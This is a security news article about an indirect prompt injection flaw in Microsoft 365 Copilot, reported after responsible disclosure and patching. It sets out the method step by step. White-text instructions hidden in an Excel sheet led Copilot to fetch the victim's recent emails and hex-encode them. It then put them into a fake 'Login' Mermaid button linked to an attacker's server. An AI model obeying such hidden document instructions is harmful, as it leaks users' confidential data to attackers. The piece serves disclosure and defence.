Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection

A vulnerability in Microsoft 365 Copilot allowed attackers to trick the AI assistant into fetching and exfiltrating sensitive tenant data by hiding instructions in a document.

The AI then encoded the data into a malicious Mermaid diagram that, when clicked, sent the stolen information to an attacker’s server.

When Microsoft 365 Copilot was asked to summarize a specially crafted Office document, an indirect prompt injection payload caused it to run hidden steps, as reported by Researchers.

Instead of producing a normal summary, it fetched recent corporate emails, hex-encoded them, and built a fake “Login” button as a Mermaid diagram.

That diagram contained CSS and a hyperlink pointing to an attacker’s server with the encoded data embedded in the URL.

When an unsuspecting user clicked the button, the sensitive information was transmitted to the attacker’s logs, where it could be decoded later.

How the Attack Worked

Mermaid is a tool that generates diagrams from simple text definitions. It supports flowcharts, sequence diagrams, Gantt charts, and more by using Markdown-style syntax.

When Copilot generates a Mermaid diagram, it also allows CSS styling, which opens up a vector for embedding malicious links.

In this case, the attacker used Copilot’s built-in search tool to retrieve the victim’s recent emails. The AI then transformed the list into a single hex-encoded string, breaking it into lines of 30 characters so the Mermaid renderer would not error out.

Finally, the AI inserted the hex data into a clickable “Login” node. The node’s CSS style defined the hyperlink that pointed to a private Burp Collaborator server. The code looked roughly like this:

graph LR

    A[Malicious Document] -->|User asks to summarize| B[Indirect Prompt Injection]

    B --> C[Fetch & Encode Emails]

    C --> D[Generate Fake Login Button]

    D -->|User clicks| E[Exfiltrate Data]

Clicking the button caused a hidden iframe to appear, briefly showing an HTTP response from the attacker’s server before disappearing, making the trick more believable.

The attacker even replaced the response contents with a mock Microsoft 365 login screen image to convince users they needed to log in to see the summary.

Indirect prompt injection occurs when attackers embed instructions within external content like documents or emails.

When an AI processes that content, the hidden commands take effect, letting attackers override the intended behavior.

Unlike direct injection where the attacker interacts with the model indirect injection exploits benign-looking data sources the AI trusts.

To hide instructions, the attacker used white text in an Excel sheet. The first page contained nested instructions telling Copilot to ignore the financial data and focus on a login prompt.

A second hidden page instructed Copilot to fetch emails, encode them, and render the malicious diagram.

After responsible disclosure, Microsoft patched Copilot to disable interactive elements like hyperlinks in Mermaid diagrams.

This change prevents AI-generated diagrams from including clickable links, closing the exfiltration channel. Users are advised to update their Copilot integrations and avoid summarizing untrusted documents until the patch is applied.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.

Source link

How the Attack Worked

Related Posts